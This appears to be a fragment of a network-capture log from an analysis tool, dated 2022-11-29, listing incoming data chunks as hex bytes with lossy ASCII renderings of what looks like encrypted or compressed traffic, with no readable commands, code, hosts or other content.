                                  2022-11-29 15:56:46 UTC2215INData Raw: 98 82 28 96 2f 8f b2 93 6d 4f eb 5b f5 00 ae f4 b3 85 9a c8 76 b6 bf 34 7f e1 1a f7 4e 08 f6 4e 58 2c 5f c1 61 52 95 e2 7b 9f 39 e1 35 bd 6b f4 5b fd 16 92 b3 5e 5f b5 7c 82 a0 db da 8f a5 7c be f2 87 26 86 4d 4e df b7 66 83 49 3f 1f 9b ae b5 2c 48 e8 cb 9a 33 f0 57 94 05 f7 03 b1 71 0e 2d 92 7e 6e e2 67 5f 65 24 29 9b b6 44 a5 88 3b cf 4e 68 e5 f6 d1 d1 d5 a6 f4 4b bc 98 3f 0f a8 4b 42 ff 55 a6 0e b3 bc 79 ec 22 4c 64 37 c7 5a 28 3f 10 af 3f c2 7d 1d 9a 2d 3f 17 46 ac fc f3 41 45 87 84 61 b1 76 1b 9c 3b 95 2e 17 f5 55 e0 3e d3 8d 15 ee 2c ad 5a 8f 2a 82 12 58 1f e0 f3 d9 6c 7c ee 8f 75 03 90 fd 3d e5 1c 67 b7 46 2f bd 87 4a b1 fb b9 dd 9b 53 f7 10 a8 c0 43 34 39 19 42 5f 15 45 90 a9 11 4c f3 83 16 7d 2b ce 5d cf 2d e4 99 a2 9f 04 2d 7f 2d ee db 27 fc ee
                                  Data Ascii: (/mO[v4NNX,_aR{95k[^_||&MNfI?,H3Wq-~ng_e$)D;NhK?KBUy"Ld7Z(??}-?FAEav;.U>,Z*Xl|u=gF/JSC49B_EL}+]---'
                                  2022-11-29 15:56:46 UTC2216INData Raw: 94 29 39 e7 43 a4 22 f9 95 eb a0 dc ef 27 4d d2 3a 69 04 8e 5a 87 e4 3d e3 89 bf 7a 77 54 a2 fa ba 36 e3 e7 f5 ab 9d 5e 86 60 4b 6f 3c e9 df 72 56 a3 b5 fc 97 62 ef f4 87 45 06 8e 68 31 07 50 57 6f d1 c6 79 f0 83 44 55 1e 22 d9 3e cb e7 ff 39 39 3a 4b be e1 02 f3 3c 85 35 04 d9 ca 06 89 bc 30 a4 d4 a8 cb 8d 25 e3 38 e2 f8 48 14 aa 45 52 cc b9 81 30 df ad 8c 8e e5 79 ad fa 97 65 88 16 36 1d d1 8c 39 d3 c0 9b 61 09 1b eb bc 47 e7 e1 88 1c 5e 38 44 57 d6 18 67 0e 7c 92 76 68 6f fb 4e 7c d0 43 73 87 1e f7 7a 6e 7d 42 57 e5 4c af 9c 16 f7 83 f0 10 7d af 2b fa fe e6 b8 d5 34 4e 44 ef 0b 61 25 fe 63 69 13 35 75 88 d9 60 21 7a 01 0f b6 6e a0 f9 58 43 89 8b 77 b1 1e 9a 4d 2c 02 5c 0f e9 11 31 dd 5e 84 2a 04 20 bd 17 72 16 b6 3f 22 25 42 4d ad 1c 74 5b 84 c9 17 b0
                                  Data Ascii: )9C"'M:iZ=zwT6^`Ko<rVbEh1PWoyDU">99:K<50%8HER0ye69aG^8DWg|vhoN|Cszn}BWL}+4NDa%ci5u`!znXCwM,\1^* r?"%BMt[
                                  2022-11-29 15:56:46 UTC2217INData Raw: 93 eb 3e 7b fa f8 1c d2 81 c3 23 56 df 3e 5a 86 55 5c b2 a0 13 97 bc 88 ab 90 0c 52 c8 11 91 ce c5 d7 42 f1 ab a6 45 7b e7 d1 5f d0 97 86 56 f7 58 aa 0c 4a e8 ab 58 d4 40 1d 71 f1 ea 32 48 c4 bf 33 7a d8 0c 52 f4 24 5a 70 a5 e5 4e 9c 59 1f 26 4a 18 5a 71 b8 ed 1a 23 1e fa 9b b6 46 0a a0 75 51 72 4b 26 ae 21 d4 bc f6 d2 ae 5e 50 80 22 c0 77 3a 08 c6 8b a9 aa bb d8 a9 37 32 d5 73 88 44 0d 9d 71 f0 08 69 ea 3b 0b ff e9 c0 89 f9 ed f7 e8 b2 54 86 4b 1b 64 00 b1 b3 f8 3a 2e 9e 7c 05 1d a3 15 be 7f fb b8 67 5e 7b 96 16 8f c9 be 0d 8c 7b 03 6d db 08 02 83 e1 e4 b3 d2 43 20 ae 7e 1f e3 26 bb 93 ed 97 71 ea af 28 e9 78 27 fa dc fe 92 16 bd 1e 40 5a 56 3e 99 d4 f2 d1 4c 5c fe 96 cb ac 11 20 c5 4f dc 9b 5b 7c 91 83 4c fe 59 53 1b a1 67 5e c1 2d 70 b9 c7 bb 90 69 fa
                                  Data Ascii: >{#V>ZU\RBE{_VXJX@q2H3zR$ZpNY&JZq#FuQrK&!^P"w:72sDqi;TKd:.|g^{{mC ~&q(x'@ZV>L\ O[|LYSg^-pi
                                  2022-11-29 15:56:46 UTC2219INData Raw: 1b 81 28 72 91 d1 9d 3c 6b 21 b4 8b ab 90 f7 83 c6 27 80 e9 c6 ef dd fa a4 96 ef de c4 1e a7 eb 24 6c 3e 80 80 82 96 94 9f 0d 3d 07 1c 33 a6 ef 0b 0a 48 1c e5 ff 1d 0c b9 9f 22 17 95 68 d1 e9 c6 d7 ef e9 98 fb 5f 6b 48 95 ed eb 0b a7 96 f1 74 d7 bd 94 90 bd 8b 4e 50 c4 8a 16 21 45 77 78 ec 8d d7 c8 0b 82 38 89 54 b5 12 b3 07 01 62 3c 01 8e f9 54 49 b2 55 f9 2b 9b 0f b3 35 df 8c b5 f3 59 8c 99 92 b0 4f 28 9d b7 7d 5e cc 81 45 bc 5e d5 67 6e f3 7d 42 4a 22 54 ed 35 25 0e 95 65 40 b4 ae c3 50 76 1a ba c8 0d 05 c0 47 75 eb 34 d6 42 01 00 bc 75 4b fa ef 7c 10 a0 c8 12 86 98 a3 81 c1 63 55 50 09 24 4e 23 2b 20 54 cc c4 a7 60 d1 0e da 2d a1 46 f8 13 18 a4 ac 7e c4 82 e3 99 e3 df 8e 7d 7d a1 e4 1a 7c 7d 1c 6f a5 30 62 78 a0 3e 90 33 e8 a5 ec 64 a9 55 49 87 93 f4
                                  Data Ascii: (r<k!'$l>=3H"h_kHtNP!Ewx8Tb<TIU+5YO(}^E^gn}BJ"T5%e@PvGu4BuK|cUP$N#+ T`-F~}}|}o0bx>3dUI
                                  2022-11-29 15:56:46 UTC2220INData Raw: 29 2a 51 f8 7b 0d f3 e2 e9 43 70 10 29 60 98 6f a9 1b 83 15 b4 09 37 af 3a 59 85 a9 a6 f5 55 59 40 70 61 4d d7 41 d9 02 87 df 0c 32 b5 68 0a 2f 55 98 81 14 84 bb 7a 42 cc 05 cc 15 15 53 31 9d 4c 17 d2 14 b1 32 e4 7f 63 85 9e 4c 2a de be ee 3c 92 ab a8 14 ef 42 a0 33 ae af dc 29 1b f0 20 1b 17 b7 14 e1 eb 33 2a 8f 26 c9 e5 7d cf 6f cd ed 6f 6c 41 db bc d9 e4 b3 ce 99 25 17 d9 cb 8a 2c f3 26 1e 27 44 a0 35 16 90 af 38 0a dc 5e ff 04 aa 94 9e a0 43 80 27 fc 77 91 db c4 f5 0a 2e 86 fd cf db 25 78 de 16 76 af 28 1e 8c ea 2f 0b a8 67 e2 8c d4 97 5a b3 9a 7a 44 a2 b5 76 5a 8a 31 89 08 10 15 6e 54 eb 7f 86 97 e1 bc 8c 8f 5e 6b 7b c2 b2 c0 de 54 d8 50 30 d4 45 91 49 1c fc 62 c4 6d 75 01 e0 a1 2d 0d de c9 2e 26 c2 58 eb 96 f1 62 f7 7e 58 e1 51 85 ef 06 4b eb 0a 2c
                                  Data Ascii: )*Q{Cp)`o7:YUY@paMA2h/UzBS1L2cL*<B3) 3*&}oolA%,&'D58^C'w.%xv(/gZzDvZ1nT^k{TP0EIbmu-.&Xb~XQK,
                                  2022-11-29 15:56:46 UTC2222INData Raw: c6 27 7f fe ab 44 f8 fd cf 07 af 51 2f e6 c9 06 2b 9c 60 36 04 6a ae 6b c3 b2 28 2f a8 71 8f cf 82 e4 b7 20 49 e1 2c 1a e1 d4 dd 07 dc d2 a0 89 c0 f5 a8 ac df d9 63 fb b4 80 6b 29 d7 ff a2 61 cd ca 27 43 16 c0 17 42 48 ae c0 33 80 6b b1 ed 2d 5d 9c 7d 35 41 92 27 8d 3a 2e b0 b2 2f 26 f6 b8 73 58 1b 1f 36 c4 20 87 1a b3 67 f0 4e 63 dc 3c f7 e6 45 4d 5d 6c e0 ec 96 b0 df b8 07 54 65 16 59 c6 c5 66 53 e1 75 8d 8e 1e 89 94 39 e3 bd 13 05 b2 67 a7 dd 73 00 37 7d 2a d8 17 80 67 21 80 52 e7 bf af 96 ce 30 a5 1c 3d dd c8 f0 0a c5 91 76 32 6e 00 ce 9f 01 16 27 7d 68 96 31 55 e4 3c 7a d8 8f 49 d9 78 da 1e 65 ca 7b 08 6a f7 f0 be 4d 91 7b 5d ee 55 bf d2 00 6b df b4 7d e5 e1 17 8c 4b bf a9 1b 40 ee c2 fd c2 e6 3a 63 dd e3 13 e3 59 37 03 90 15 60 2f 95 9d f6 c3 e3 e5
                                  Data Ascii: 'DQ/+`6jk(/q I,ck)a'CBH3k-]}5A':./&sX6 gNc<EM]lTeYfSu9gs7}*g!R0=v2n'}h1U<zIxe{jM{]Uk}K@:cY7`/
                                  2022-11-29 15:56:46 UTC2223INData Raw: 90 a5 0d 65 5b a5 00 6f ad 3d 6e 1c 91 f6 41 0d 0b c8 5a d6 01 1a 21 e8 ac b2 94 cd fc 82 8b ab a3 53 bc e7 8d 18 83 87 e6 4a 95 0d bf 6e 7f 66 20 5a 83 88 18 53 32 06 ab da 89 b3 6b 3b ce ba 53 ce f2 1f 65 1e b8 88 1f 32 f4 4b 84 f0 d8 fa 0c 91 53 b0 dd 82 2c 03 7f 23 86 fc 8e f7 9d 96 09 ce a0 3b ab ab f3 ea 1b 96 78 05 13 bb 1e 48 62 c2 a2 c9 34 3d 0e 05 98 aa 50 89 13 32 5a 3a d2 3b 82 f9 f4 6b 97 1a 89 98 0a 99 52 f6 28 f4 b8 f5 4f a4 c7 79 5e ae d5 6a a2 ae 1e 27 46 1e 5e 06 6b 0a 62 a3 c9 b1 24 e5 a3 29 4f 93 9e 67 e1 bd 8c a4 23 7a 7c 36 5d 82 4a da 73 9f 3a 2b cb 6b c1 fe 7c 14 06 5d cf ec d1 c1 4b f1 54 38 e9 42 d6 14 c9 80 02 cb af ad a7 8e 95 23 9e dc f2 2f a7 7a b8 37 42 a5 7f 9f 15 42 8a 3e d1 22 d5 34 48 f9 ac 43 3f 8d ff d9 44 c1 0a 71 3a
                                  Data Ascii: e[o=nAZ!SJnf ZS2k;Se2KS,#;xHb4=P2Z:;kR(Oy^j'F^kb$)Og#z|6]Js:+k|]KT8B#/z7BB>"4HC?Dq:
                                  2022-11-29 15:56:46 UTC2224INData Raw: 80 f0 74 0b cf e5 b9 5a 67 b9 3a d2 84 dc 26 11 cf 98 dc 2e a6 05 d7 48 f8 97 52 16 a6 e3 3e f6 d1 94 3c 1d 56 53 98 5f 16 91 0e 57 aa 22 fe 85 14 80 53 7b bb d1 89 86 cb 00 ba 33 7c c1 45 4f be e1 1b 95 33 91 b9 2a 29 2d d9 04 1e 3b 3e b8 2f 1e a3 7b 28 2a df 9e c7 b5 c7 d4 3c 5c bd 81 e2 93 21 c2 04 fc 9a cc 51 75 ba 66 de bb 5e c5 90 19 65 60 5a eb 43 4e d9 40 b0 c8 0a 35 3f 36 41 82 a5 10 6d 3c cb cf 09 f0 f1 87 22 27 1e 40 5e ca f1 5e 2f fd e0 3d d5 0a 73 bd 69 0c e4 ea c4 81 2b 10 e1 c6 5c 95 e0 d9 c8 fe e9 eb 37 f8 0f 58 ce 76 62 2f aa f9 d1 d1 4b c8 52 93 32 eb ae 61 33 3d 19 e8 f9 5e 3b 11 d4 70 46 08 d8 6c c0 43 36 07 a2 61 7f 1e ee ed 83 3a 5f dc 91 23 9d 14 15 78 a4 9b 5b 21 a0 18 42 5a 57 2e 64 91 5d 07 ac 6a 96 d2 53 98 86 4d 6c f9 3c 0a d1
                                  Data Ascii: tZg:&.HR><VS_W"S{3|EO3*)-;>/{(*<\!Quf^e`ZCN@5?6Am<"'@^^/=si+\7Xvb/KR2a3=^;pFlC6a:_#x[!BZW.d]jSMl<
                                  2022-11-29 15:56:46 UTC2226INData Raw: 2e b9 53 04 9a 71 7d 06 cd ab 56 15 0a 8e fa 2f e2 29 5a 16 8b 41 f5 1e 23 92 fb 40 e0 31 46 a8 d3 86 13 d3 38 f5 af 3c 02 57 c0 0f 25 a7 ac a0 1b fa 01 0d be 39 18 e8 4b 5b 83 4c 86 e0 6b 38 b0 3e fb 61 da 6d 02 3b cc 8a 2f 60 e8 b8 a8 07 14 a6 9c 74 b2 ba 5b 89 53 f9 0d 78 14 41 8f d7 bc 8e 96 17 5b 9b cc 0a d7 2d 1b 7e 5c 04 da b9 95 00 14 9c 7f f7 36 44 5b d9 6d 8b 2e 58 9b ae f2 43 cd 77 5c 27 73 51 5f d7 c7 4b 7b eb ea 23 f2 04 04 bc 1d 8f 68 2d 31 cc 33 02 9c 27 29 6e 32 58 e7 12 00 30 38 61 1f 51 1d 86 84 94 db a2 41 84 68 08 28 ed 5e 7d 65 d6 8c 81 42 9c eb ea 25 95 fb af e8 85 12 23 2e d3 7d 5e 30 66 0c f3 a0 31 0d 84 ae 5d 15 b8 97 c0 a7 ec fa b0 02 c0 c0 d1 20 31 ec 75 fd dd a2 6d a7 1a e0 6f 3e 18 7a b8 65 2f b6 d0 72 a5 33 5a d3 55 fc 21 e1
                                  Data Ascii: .Sq}V/)ZA#@1F8<W%9K[Lk8>am;/`t[SxA[-~\6D[m.XCw\'sQ_K{#h-13')n2X08aQAh(^}eB%#.}^0f1] 1umo>ze/r3ZU!
                                  2022-11-29 15:56:46 UTC2227INData Raw: 13 af 79 06 b8 80 c9 d4 c9 9a e1 2a 1c 2c 41 b6 5f d7 fa 15 48 9a 03 cc 44 f4 4f df a4 0e 62 57 15 2f 28 9e 91 02 a6 28 c0 73 4f 9d b0 60 6f 0d f1 a8 f5 4c a8 77 b1 53 b8 ac 9c c0 80 ec f3 f6 5a d5 1a dc fb b1 ed 3c 0e 2b 6c f8 3d 8b a5 16 ca f0 9d 29 e3 73 6b 10 f9 64 cf ce e0 78 84 a2 fb 2b b7 10 44 5f ca 80 a7 17 7f 77 d4 37 3c 2c a3 2e 9b 2e 90 81 ff a6 f2 0c c0 9d c4 e4 e6 58 91 fe 75 d8 b2 95 99 7b a2 47 26 3d 1a 78 c1 99 17 c0 55 f2 75 8b cd d4 72 27 0c ca 21 c0 d8 c0 7a 9f bc 1b a5 d8 8b d9 df e5 ba 99 a5 ce e8 7d 8d ba 5e bc b3 9c fb 9a 44 b6 c4 da 4e 0e 68 63 09 08 0a e9 e5 b3 51 d7 4a 16 f6 69 b1 b6 d5 b3 e1 94 2e 1c 23 27 11 28 d8 e5 bd b2 01 87 32 40 c1 86 f7 c3 f5 a7 ed d8 f5 7d 66 08 9d 85 8a 37 5b c0 2d bf 9e b8 c7 3b e5 9c a4 92 18 92 ff
                                  Data Ascii: y*,A_HDObW/((sO`oLwSZ<+l=)skdx+D_w7<,..Xu{G&=xUur'!z}^DNhcQJi.#'(2@}f7[-;
                                  2022-11-29 15:56:46 UTC2227INData Raw: 16 2f df db 73 9d 2e e9 cf 60 3b 44 5c 2d 24 e8 c8 36 39 eb 57 d5 fb 1f c4 a6 2b ad 61 5d 3a 6c 10 cc 4e b5 2f b3 8a 09 a0 6d 2e 87 3a 5c 9d 93 f3 fa 25 23 1c 29 67 3f 09 6e f2 39 18 d0 be a0 92 c8 0f 68 17 04 cc 6d 48 b1 48 15 23 3a b4 87 8c 0f fd 17 0c ca 4b 84 2d bd 62 56 04 f3 a2 22 a2 a6 5c b8 e2 30 90 3a 0b c2 f0 d9 01 7b 0c a6 e2 30 63 68 3e b7 0f bd f9 42 75 14 3d c6 36 b1 c9 9f 8b 70 cf 08 5e 4f 1a 47 c2 5a 10 c0 fb d6 35 96 c7 59 3b 23 61 f5 c6 5e d5 76 a0 3d 9b 74 e5 bb 62 e9 e9 f1 81 b3 71 dc ff f9 cd cc ce d8 64 42 fc 0e 4e 7f 7d ad 66 fd 3f 6d 2e b1 9e 64 a8 ae 8c 5c f1 b8 33 77 e0 bc d1 95 26 6a ea f5 2d cc 66 12 e1 a5 4c 38 70 e5 14 0a 0b b8 46 a8 8a aa 9a 3f 28 5f 57 35 25 50 05 c5 bd e2 11 e2 18 ab e2 e2 74 a3 51 76 e2 a7 83 8a da 6c 33
                                  Data Ascii: /s.`;D\-$69W+a]:lN/m.:\%#)g?n9hmHH#:K-bV"\0:{0ch>Bu=6p^OGZ5Y;#a^v=tbqdBN}f?m.d\3w&j-fL8pF?(_W5%PtQvl3
                                  2022-11-29 15:56:46 UTC2229INData Raw: 80 cb 04 82 85 93 01 bc 62 8e 3a 3c 1c 5a 1a ac 28 c6 66 06 28 25 ea 71 e3 93 31 a5 00 31 0c 38 cd 35 48 2d 8c 46 c5 bb 76 2e 1a 42 9b 1b 0c f1 a8 6b 3c 71 0b 3a 4d 35 c6 de ed b1 e2 95 8f 7e ae c5 30 39 34 34 e0 9f 68 73 66 a7 8f 46 d7 66 43 83 fe 0b fb ef 46 0c 2d 5a d0 44 e4 f0 6b 8e ca 30 09 57 b5 05 01 99 ea 66 93 91 f9 90 21 c1 7e e3 67 b1 a8 20 88 dc 18 47 3a da f5 15 d5 f3 cb b1 57 a9 fb 38 5b a7 82 e0 73 0a 2f 11 68 e2 54 e9 cf 07 82 8c 32 61 64 d0 eb 46 81 a8 d6 b3 9f 44 88 f6 86 1e 6e 89 5d 79 df fb 36 e2 b1 f1 9d bf ab b4 dc 8c f8 6b cb 5f e0 a3 cb c6 7b d6 af 54 d2 9a 63 d2 66 93 5b e4 c3 db 5c bb 41 58 86 21 41 78 42 62 74 11 13 ac 54 2a e4 14 bb 30 83 ed 4d e3 d0 ad c7 eb e6 14 92 c8 1b f6 9c c1 f8 5b 76 da ee 4d 91 f1 bc d3 3c 49 96 dc ca
                                  Data Ascii: b:<Z(f(%q1185H-Fv.Bk<q:M5~0944hsfFfCF-ZDk0Wf!~g G:W8[s/hT2adFDn]y6k_{Tcf[\AX!AxBbtT*0M[vM<I
                                  2022-11-29 15:56:46 UTC2230INData Raw: 13 f1 c7 31 27 76 b8 be 2a 5f e1 7c a5 a4 e8 85 94 81 71 a5 57 4e c5 51 50 be 3c 11 09 ea 6b 30 07 62 03 6c 95 36 00 2e 07 c7 69 5f 94 eb 95 37 ca 28 c3 ee 4c ed d5 43 9e da 6d 9c 11 0e b0 93 6b af 19 2b d1 ea c5 a9 66 68 f1 01 3e 21 ec 31 77 05 2e 01 7c ea df ad 43 02 cc 50 6a 33 9a 8f e3 53 fe 30 33 28 87 57 6d dc ae fa 8c 50 f0 6f ac 54 88 42 cf 9e 07 97 5a 72 ce e6 c8 7b 1d 81 61 1c 7d 6b b6 cb c6 05 a7 aa 24 0e 93 76 56 05 14 8b 7d 2a 76 0d a1 1f f0 d5 aa cf 58 d9 26 f1 c3 82 02 f5 be e8 c8 4e a6 b3 57 35 4d 64 5b 63 17 fa d1 66 ec d7 61 18 1d d8 00 ef aa 27 27 8a 7a e7 41 13 7d 21 4f 9d 1a d2 0d ed bf c8 ab a9 2e 13 a4 1d bb bf 28 a2 ab c2 23 87 aa 53 fb e0 f3 a6 71 da 89 e8 b9 4f eb 38 51 1a 05 3e 4c 3a 82 91 cd d0 e5 58 80 c9 95 8d f5 a7 ac a7 35
                                  Data Ascii: 1'v*_|qWNQP<k0bl6.i_7(LCmk+fh>!1w.|CPj3S03(WmPoTBZr{a}k$vV}*vX&NW5Md[cfa''zA}!O.(#SqO8Q>L:X5
                                  2022-11-29 15:56:46 UTC2231INData Raw: 8f e5 c0 1b c6 a9 8c 19 85 86 cd 39 74 61 c8 5f c0 d5 6e cf 6f 46 e5 ed 31 95 83 0d 00 e2 47 99 c2 6f 83 d8 1e 70 94 5e 0e 24 e6 a4 78 a1 fe 27 f3 d9 c5 b1 18 59 59 fd a5 be 49 12 c1 85 e9 f5 d9 ad 2e 00 a0 67 f4 0a c6 1b 45 7d 1e 33 bb 26 4b 55 f0 88 d1 ed dd 0f 86 8f 96 f8 44 d8 44 af e3 43 70 74 57 78 5a 5a 30 5c a9 57 4c e8 2b 90 18 7b 7c 34 81 f3 f5 06 c4 26 0e 90 0b d4 cf 82 9f 88 07 45 cf 69 8a 83 98 a8 01 8e b1 3c 4b 86 2a ee 67 3b 46 16 78 41 39 42 11 01 ff 35 7a 64 b0 e5 8a 79 2a fe 2e 68 27 07 1e 4f b9 c1 d0 5e c9 21 e7 91 72 f7 72 57 34 31 e8 84 1a d7 d2 c6 b8 81 00 0c 4f cf c4 5a e9 c5 3d 23 c1 bd 04 fc 65 9c 94 8d c6 fb 01 5b b6 51 99 b9 de 40 1d 33 15 6a fa bd 99 35 e7 bd 18 b3 a6 5c 23 86 42 f1 20 9b 95 a5 e7 9d d5 7b 71 d9 09 b3 ea 3a e2
                                  Data Ascii: 9ta_noF1Gop^$x'YYI.gE}3&KUDDCptWxZZ0\WL+{|4&Ei<K*g;FxA9B5zdy*.h'O^!rrW41OZ=#e[Q@3j5\#B {q:
                                  2022-11-29 15:56:46 UTC2233INData Raw: 1f 2b 6b ac 4c f3 13 ec bd f9 5b 05 24 f3 0a 07 cf 97 c8 6a 19 1c d7 36 6d 42 bc a6 98 e4 fb 12 ca bc dd 61 b2 83 98 da aa 22 d1 88 72 3c 6c a9 7f 78 fd a9 7a ce 10 b0 93 35 06 0e 98 6f 0d f9 76 2d 4a 63 80 56 34 70 01 62 a6 c3 94 91 42 c0 91 64 12 36 a0 89 16 2c cf b1 59 d2 bf 8f 2d ec 56 1e 6b e4 23 0b 37 2e d8 4c cb fd 7f 3e 53 37 1e f9 cb c3 46 39 21 89 19 e1 73 ec 57 f7 cd 32 70 9b 28 8c cf f5 0a 35 84 61 57 da 98 5d 47 ab 45 6a 40 56 b5 30 da 4b 6b 98 f5 ce e7 f9 4b b0 47 dc ec 1b 95 66 39 b8 ff 9f 8c 60 cb ab ef bb 19 34 bc 54 8c 5c 22 14 78 8b c5 3b 7b 3f 5f ca 8e 79 ed 18 32 26 86 fd 54 90 a0 1e e2 d5 f4 ca 24 34 4e 69 78 c4 e0 f4 8d 9e 14 28 9d 6c 7b dc 66 6c 23 43 c5 8b 17 1f e6 1d f6 70 02 da a4 db 35 5b 54 41 7e 37 8f b0 5e b7 07 81 0d 3e 25
                                  Data Ascii: +kL[$j6mBa"r<lxz5ov-JcV4pbBd6,Y-Vk#7.L>S7F9!sW2p(5aW]GEj@V0KkKGf9`4T\"x;{?_y2&T$4Nix(l{fl#Cp5[TA~7^>%
                                  2022-11-29 15:56:46 UTC2234INData Raw: 18 7c d7 67 f9 78 70 2c 08 b3 f2 ff 51 c7 20 e2 f0 5f 7c 4a d1 f0 23 a3 16 18 01 12 cf c1 1c 60 5d 5f 96 bb 09 73 b1 30 e9 49 79 36 d6 52 1f b7 2b 8d c4 60 d2 4a 91 39 de 35 cc ee 9c 9d c1 75 0c ae bc bc 23 bd cb 80 98 32 3d ba 2f 23 a5 7e e4 ae 59 cf 9c bc 40 42 1e 88 6d c6 3b 6f 5c bd 0c 51 d0 b1 71 76 41 de 9b 05 69 dd cc db 8f 22 ad 1f 58 c7 95 f9 35 d6 26 b2 60 9f 94 56 74 2e ca 44 f5 3c 9f 1f 81 c6 40 49 26 6e ee f5 63 e7 ee 29 56 22 9a 3d ef 0c 1c 3e 85 8d 3c ca c9 a1 d8 45 67 4f 29 b4 19 a4 f9 9f ca 44 08 7e 20 c4 cb 49 b7 17 9b 96 0a c6 aa a2 2b 3a 76 e3 e4 3b 43 f2 fc 4d 13 c7 4d b1 42 09 a4 1f cc f4 de 18 f5 22 fb 8e db 99 17 28 ef 43 e4 f7 7e 57 32 b0 b2 18 ce 8e b2 7e 5e 94 f7 7e bb 8d db 25 4d f1 43 7f 99 cd e6 5a 93 82 1e 1c 34 29 b6 77 cb
                                  Data Ascii: |gxp,Q _|J#`]_s0Iy6R+`J95u#2=/#~Y@Bm;o\QqvAi"X5&`Vt.D<@I&nc)V"=><EgO)D~ I+:v;CMMB"(C~W2~^~%MCZ4)w
                                  2022-11-29 15:56:46 UTC2235INData Raw: 25 b9 33 0a a6 65 27 49 8d fa 9c 5a 3d 49 d7 49 08 e9 98 9f 02 c4 61 68 5e b0 a9 8e 51 50 c6 42 10 73 7b bc 05 bb c6 b1 d4 8f 46 e7 24 3b aa f9 d4 da 99 79 d2 42 68 a0 2f cd 6b 6f 09 92 08 28 76 3c d6 f4 da a4 38 a2 d8 24 92 60 c2 99 fa be fe a3 44 06 a4 1e 9c 30 52 44 fc 48 37 90 8f 20 c0 bb 09 59 1a 5c 6a 54 63 51 00 e7 7c 01 cf b5 7a 3e 60 67 7c 25 c3 45 de 28 f0 10 cd a0 43 6d e5 8e 8c 27 01 8a ee e0 84 cf d3 aa e7 cf e4 6d eb b3 b0 1b 0a 2c b2 b8 b0 5f d7 8d 1f 80 48 da c9 41 d0 cd c8 c9 0b c6 3f 5d 92 bd b8 9e 4c c5 aa a2 2b d5 fa 32 ea 5a 62 bd 38 5b 11 e9 da c1 45 1c 60 42 b4 42 4f 07 7b 6e 92 2a a3 47 7c 4a 84 91 ba 7a 05 f2 a0 82 2d 89 e1 95 f8 5c 34 4d ac 48 47 05 b9 b3 bb b3 1d 7b d2 8c 5a 4e 0b 80 8a c3 7a 09 d5 fb b0 ce eb e5 61 c6 94 7e 0e
                                  Data Ascii: %3e'IZ=IIah^QPBs{F$;yBh/ko(v<8$`D0RDH7 Y\jTcQ|z>`g|%E(Cm'm,_HA?]L+2Zb8[E`BBO{n*G|Jz-\4MHG{ZNza~
                                  2022-11-29 15:56:46 UTC2237INData Raw: 22 93 4f c4 6b 1c 0b 08 1c 45 de 3a 3e e4 28 b9 fb ce 83 ea e2 b5 43 ba 6b 0c 13 5b 2f 82 c6 38 76 34 67 b2 0e 0b 9c 17 fa f9 04 2e 28 28 f8 50 28 ec 40 a1 5d 32 3a 1a 4c 47 c8 45 c0 fb 79 2f bb 3b 61 92 05 78 02 f7 35 ab 96 7c fd d8 51 9f 24 27 ba df 95 89 b0 b3 63 ba 70 fc 5d d7 3b 67 96 bb 05 cc 1a f8 e7 8c b2 a5 0f 76 bd 54 8a 4a 03 5c 62 09 50 a8 0a 59 03 d3 6f 06 f8 d0 b5 86 ab b6 ae 22 1a 66 36 f1 a3 c8 ab 4b e4 cf 94 96 0c f4 ce dc b7 44 2e 69 6a 8c b2 17 37 fe 95 3b e9 c5 09 b4 ff 86 87 e4 b9 aa b1 89 87 df d8 c7 a3 4e 56 51 53 7d 7e 27 87 c5 74 b3 fa 80 7e 1a d3 81 80 e5 f2 73 8f 3d 4b df e1 7c c9 79 ce 9c a3 ca 8e 91 13 cb 82 ee 71 17 87 ef 7f 76 61 43 26 0a bd 89 c9 0f 94 95 c1 a0 fb 43 b3 2f 68 ca 18 92 c5 08 cb c1 e4 52 a1 ce 9f 01 b9 65 e7
                                  Data Ascii: "OkE:>(Ck[/8v4g.((P(@]2:LGEy/;ax5|Q$'cp];gvTJ\bPYo"f6KD.ij7;NVQS}~'t~s=K|yqvaC&C/hRe
                                  2022-11-29 15:56:46 UTC2238INData Raw: 9e 20 d9 0a 03 b0 6d 69 16 c3 62 b6 91 06 7d bf a2 c0 b2 dd cf cb 56 38 8c a8 d0 6d 37 3e 67 e4 14 a2 5c 45 69 84 2c 44 87 37 20 98 b0 2c 4a 02 08 91 5a db 66 67 a9 73 ff 9a c9 04 42 4f c3 43 ed d1 51 60 30 0e bc 9a 7b a3 24 dd d5 d8 29 93 95 91 5e b3 19 d7 00 35 21 d4 1f e5 45 24 af e7 43 3f 89 f3 ee 16 2c 95 fe d5 ae ba 9d 34 e8 ce f5 14 e9 42 b1 75 f3 0b 44 7d f5 06 c3 1e 45 d0 ab 11 83 cd b0 58 6c 6c b5 96 81 55 01 61 c6 a5 d9 e3 97 5e e8 71 a1 51 fa eb 13 8a 29 19 10 0f fc fa 33 86 2c 5c e2 57 52 75 77 00 54 ed 4e fd d1 06 c2 44 66 03 b7 98 fb 18 f7 10 11 c0 ee 4d b6 bc ca 80 b6 01 a1 00 a3 e7 5c 33 b9 3b 0e c0 b4 80 f5 cf 0a 50 c1 c2 ff 34 9a 31 89 37 87 09 d0 7c 77 a2 18 af 92 f6 6f c5 85 1d 26 88 da 48 ee b5 ed 73 94 ae 0b 6a 3c 68 87 95 36 9b ef
                                  Data Ascii: mib}V8m7>g\Ei,D7 ,JZfgsBOCQ`0{$)^5!E$C?,4BuD}EXllUa^qQ)3,\WRuwTNDfM\3;P417|wo&Hsj<h6
                                  2022-11-29 15:56:46 UTC2239INData Raw: 40 5d 80 1c 95 7f 22 a4 3f 39 4d 6f 74 a3 b1 a4 8c b9 d0 5c f4 9f 7d 5a 59 82 96 f1 9b 95 5a 44 90 38 51 9a 7e 87 7b 30 fd 5e c2 77 3e e5 8d d7 32 ab b9 8b a9 d8 5e ee 84 4f e0 b0 58 a5 b2 92 49 91 70 11 87 0b 4e ea 87 22 e8 1a 7d 75 25 ce 91 87 2e b2 70 bd 81 d5 fd 84 63 81 86 e5 65 92 75 68 3a 2b f3 03 40 0c 17 81 12 f6 4e bb 74 97 93 0f e0 85 d7 46 90 f8 7c 03 c8 91 6b a1 b9 a4 be f4 ad cd b3 42 49 e1 11 89 5b 1c a1 68 a2 fc bb f7 87 79 1c d1 ed 6a 08 90 0d 47 9a 3c 40 5c 3f 53 c8 04 c5 17 98 65 36 87 87 32 9c 20 4b 0b 69 ad 7b c1 4a 0e b3 91 a0 3e 8d 45 3f 63 57 77 a5 e9 9a bd da a6 fc 33 43 1b 11 27 11 f1 38 fb 4a ac b5 a5 80 c5 ca cb eb a4 4d 89 e4 09 50 ec ad bc 5c dd fe 7c 23 ef 